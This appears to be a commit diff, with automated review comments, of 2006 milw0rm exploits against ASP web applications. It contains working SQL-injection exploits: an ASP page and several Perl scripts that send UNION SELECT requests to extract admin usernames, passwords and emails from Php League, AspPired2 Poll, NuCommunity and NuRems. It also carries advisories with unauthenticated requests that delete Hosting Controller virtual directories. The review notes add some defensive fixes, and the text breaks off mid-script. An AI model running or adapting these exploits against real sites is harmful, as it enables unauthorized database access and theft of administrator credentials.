||||
<head>
|
||||
|
||||
<script language="JavaScript">
|
||||
function functionControl1(){
|
||||
setTimeout("functionControl2()",2000);
|
||||
}
|
||||
|
||||
function functionControl2(){
|
||||
if(document.form1.field1.value==""){
|
||||
|
||||
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function writetext() {
|
||||
|
||||
if(document.form1.field1.value==""){
|
||||
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
|
||||
|
||||
}
|
||||
}
|
||||
function write(){
|
||||
setTimeout("writetext()",1000);
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
|
||||
</head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
|
||||
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp">Php League</b>v0.82 (classement.php) <u><b>
|
||||
Remote SQL Injection Exploit</b></u></a></font><br><br>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
|
||||
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
|
||||
ID=1]</b></font></td>
|
||||
<td width="50%"><center>
|
||||
<form method="post" name="form1" action="exploit2.asp?islem=get">
|
||||
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080">
|
||||
<input type="submit" value="Get"></center></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<div id=htmlAlani></div>
|
||||
|
||||
<%
|
||||
islem = Request.QueryString("islem")
|
||||
If islem = "hata1" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
|
||||
End If
|
||||
If islem = "hata2" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
|
||||
End If
|
||||
If islem = "hata3" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
If islem = "get" Then
|
||||
|
||||
string2="/consult/classement.php?champ='"
|
||||
string3="%20union%20select%200,0,concat(char(85),char(115),"
|
||||
string4="char(101),char(114),char(73),char(68),char(58),"
|
||||
string5="id,char(32),char(65),char(100),char(109)"
|
||||
string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85),"
|
||||
string7="char(115),char(101),char(114),char(78),char(97),char(109),"
|
||||
string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115),"
|
||||
string9="char(115),char(58),char(13),char(10),mot_de_passe)"
|
||||
string10="%20from%20phpl_membres%20where"
|
||||
string11="%20id%20like%20"
|
||||
string12=Request.Form("id")
|
||||
string13="/*"
|
||||
|
||||
targettext = Request.Form("text1")
|
||||
arama=InStr(1, targettext, "union" ,1)
|
||||
arama2=InStr(1, targettext, "http://" ,1)
|
||||
|
||||
If targettext="" Then
|
||||
Response.Redirect("exploit2.asp?islem=hata1")
|
||||
|
||||
Else
|
||||
If arama>0 then
|
||||
Response.Redirect("exploit2.asp?islem=hata2")
|
||||
|
||||
Else
|
||||
If arama2=0 then
|
||||
Response.Redirect("exploit2.asp?islem=hata3")
|
||||
|
||||
Else
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13
|
||||
|
||||
Public Function take(come)
|
||||
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake
|
||||
.Open "GET" , come, FALSE
|
||||
.sEnd
|
||||
take = .Responsetext
|
||||
End With
|
||||
SET objtake = Nothing
|
||||
End Function
|
||||
|
||||
get_username = take(target1)
|
||||
|
||||
getdata=InStr(get_username,"0 0/" )
|
||||
username=Mid(get_username,getdata+5,90)
|
||||
|
||||
|
||||
%>
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"> <u><b>
|
||||
ajann<br></b></u></font>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial">Data:</font></b></td>
|
||||
<td width="80%">
|
||||
<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></b></font></p>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<form method="POST" name="form2" action="#">
|
||||
<input type="hidden" name="field1" size="20" value="<%=username%>"></p>
|
||||
</form>
|
||||
|
||||
</center>
|
||||
|
||||
<script language="JavaScript">
|
||||
write()
|
||||
functionControl1()
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<%
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
Set objtake = Nothing
|
||||
%>
|
||||
|
||||
# milw0rm.com [2006-10-27]
|
||||
|
|
|
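Review bot: `functionControl2` and `writetext` read `document.form1.field1.value`, but `field1` is the hidden input inside `form2`; `form1` only contains `text1` and `id`, so the lookup is undefined, the script throws, and neither the `[Exploit Failed]` alert nor the `htmlAlani` message can ever appear. The header note `If Wrong Id = "CTYPE html PUBLIC..... see"` does not say what the operator should conclude from that; document it or remove it. As in the previous file, `<%=username%>` is emitted into the page and into the `field1` value attribute without HTML encoding. The old and new sides of this 179-line hunk are textually identical, so the commit changed only whitespace or line endings here; reviewing it with whitespace ignored (`git diff -w`) would show no change.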
@ -1,46 +1,46 @@
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.

SQL_Injection, Command Injection

-------

[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3
Found Date: 7/1/2006
Release Date: 10/10/2006

Discussion:
--------------------
UnAuthenticated user can
1- delete every sites virtual directory on hc sites
2- make forum virtual directory (with the desire name) for everysites on hc!
3- disable all hc forums by SQL Injection
4- enable all hc forums by SQL Injection

Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory.

Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
-----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
--------------------

Credit :
--------------------
Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net]

# milw0rm.com [2006-10-27]
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.

SQL_Injection, Command Injection

-------

[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3
Found Date: 7/1/2006
Release Date: 10/10/2006

Discussion:
--------------------
UnAuthenticated user can
1- delete every sites virtual directory on hc sites
2- make forum virtual directory (with the desire name) for everysites on hc!
3- disable all hc forums by SQL Injection
4- enable all hc forums by SQL Injection

Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory.

Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
-----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
--------------------

Credit :
--------------------
Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net]

# milw0rm.com [2006-10-27]
|
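Review bot: the summary line claims `SQL_Injection, Command Injection`, but none of the four PoCs is a command injection. Items 1 and 2 are a missing authentication and ownership check on the `action=disableforum` / `action=enableforum` handlers in `DisableForum.asp` and `EnableForum.asp`, where an anonymous request with `WSiteName` and `VDirName` removes or creates a site's virtual directory; items 3 and 4 are SQL injection through `ForumID` (`1 or 1=1`). The heading should name both classes correctly because they need different fixes: a session and per-site authorization check for the first pair, and an integer-validated or parameterized `ForumID` for the second; the stated remedy is the vendor's Hotfix 3.3. `Insitute` in the credit line is a typo for Institute.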
@ -1,21 +1,21 @@
*******************************************************************************
# Title : Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page: http://www.t-dreams.com

*******************************************************************************

###http://[target]/[path]/MainAnnounce2.asp?key=[ SQL ]

Example:

//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-10-30]
*******************************************************************************
# Title : Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page: http://www.t-dreams.com

*******************************************************************************

###http://[target]/[path]/MainAnnounce2.asp?key=[ SQL ]

Example:

//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-10-30]
|
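Review bot: the advisory names no affected version and no vendor response or fix, so a reader cannot tell which releases of the Announcement script are affected (the companion Guestbook advisory in the next hunk at least states v1.0). The `key=204%20union%20select%20...` example does carry the detail a defender needs: `key` is used as an unquoted numeric value, so casting it to an integer or binding it as a parameter in the ADO command closes the hole, and a `union select` inside a numeric id parameter is straightforward to flag in IIS request logs.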
@ -1,21 +1,21 @@
*******************************************************************************
# Title : Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page: http://www.t-dreams.com

*******************************************************************************

###http://[target]/[path]/guestbookview.asp?key=[ SQL ]

Example:

//guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-10-30]
*******************************************************************************
# Title : Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page: http://www.t-dreams.com

*******************************************************************************

###http://[target]/[path]/guestbookview.asp?key=[ SQL ]

Example:

//guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-10-30]
|
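Review bot: the version appears only in the title (`v1.0`); the body gives no range of affected versions, no vendor contact and no fix, and the only date is the milw0rm stamp. The root cause is the same as in the Announcement script one hunk up: `key` in `guestbookview.asp` is interpolated as an unquoted number, so the remedy is the same integer cast or parameter binding, and the `0,0,adminname,password,0,0,0` column list is the only thing that differs between the two advisories.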
@ -1,87 +1,87 @@
#!/usr/bin/perl
#[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(

use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "MoreInfo.asp?id=";
$target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2];
$target = $host.$dir.$file.$target;

$targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo;



#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";

print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket1>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
print "+**********************************************************************+\n";
exit();
}


if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";

# milw0rm.com [2006-11-09]
#!/usr/bin/perl
#[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(

use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "MoreInfo.asp?id=";
$target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2];
$target = $host.$dir.$file.$target;

$targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo;



#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";

print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket1>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
print "+**********************************************************************+\n";
exit();
}


if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";

# milw0rm.com [2006-11-09]
|
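Review bot: the usage banner says `Usage: class.pl [target] [path] [userid]` while both examples invoke `exploit.pl`; the two should agree. The `/Ad removed or not yet approved/` check is a message from a classified-ads application, not a poll, so it is template residue that cannot match this target and its `Exploit Failed` branch is dead; `s/(http:\/\/)//eg` applies the `/e` modifier to an empty replacement, which is a no-op and reads better as `s{^http://}{}`. The old and new sides of this 87-line hunk are textually identical, so the commit changed only whitespace or line endings in this file.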
@ -1,85 +1,85 @@
|
|||
#!/usr/bin/perl
|
||||
#[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "cl_CatListing.asp?cl_cat_ID=";
|
||||
$target = "-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
$targettwo = "-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20".$ARGV[2];
|
||||
$targettwo = $host.$dir.$file.$targettwo;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect for Password: $server\n";
|
||||
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket1 "GET $targettwo\n";
|
||||
print $socket1 "Host: $server\n";
|
||||
print $socket1 "Accept: */*\n";
|
||||
print $socket1 "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket1>) {
|
||||
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Password: $1\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
#!/usr/bin/perl
|
||||
#[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "cl_CatListing.asp?cl_cat_ID=";
|
||||
$target = "-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
$targettwo = "-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20".$ARGV[2];
|
||||
$targettwo = $host.$dir.$file.$targettwo;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect for Password: $server\n";
|
||||
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket1 "GET $targettwo\n";
|
||||
print $socket1 "Host: $server\n";
|
||||
print $socket1 "Accept: */*\n";
|
||||
print $socket1 "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket1>) {
|
||||
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Password: $1\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
|
|
|
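Review bot: the failure check `if ($answer =~ /Ad removed or not yet approved/) {` in both response loops is unexplained: nothing in the hunk documents that cl_CatListing.asp of NuCommunity ever emits that text, and the identical string reappears unchanged in the NuRems and NuSchool scripts of this commit, which reads as a copy-pasted check; either document the page text it is meant to match or drop it, since a response without the expected `<font size="2">` markup is otherwise only reported by the trailing `print "+ Exploit failed :(\n";` after the whole body has been read. Two smaller points: `$server =~ s/(http:\/\/)//eg;` carries the /e modifier, which evaluates the (empty) replacement as Perl code, and never uses its capture group, so `s{^http://}{}` expresses the intent without the surprise; and the script has no `use strict; use warnings;`, so a slip between `$socket` and `$socket1` in the nested loop would go unnoticed. From the defensive side the hunk states the root cause precisely: `cl_cat_ID` reaches the query as an unparameterised integer and the payload is a four-column `union select` against the `admin` table, so the fix is a bound parameter (or at minimum an integer cast of `cl_cat_ID` before use), and the URL-encoded `union%20select` in that parameter is the web-log signature to alert on.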
@ -1,73 +1,73 @@
|
|||
#!/usr/bin/perl
|
||||
#[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
|
||||
[// Usage: class.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "propertysdetails.asp?PropID=";
|
||||
$target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /Location:(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /Address:(.*?)<\/font>/){
|
||||
print "+ Password: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /# Rooms:(.*?)<\/font>/){
|
||||
print "+ Email: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
#!/usr/bin/perl
|
||||
#[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
|
||||
[// Usage: class.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "propertysdetails.asp?PropID=";
|
||||
$target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /Location:(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
}
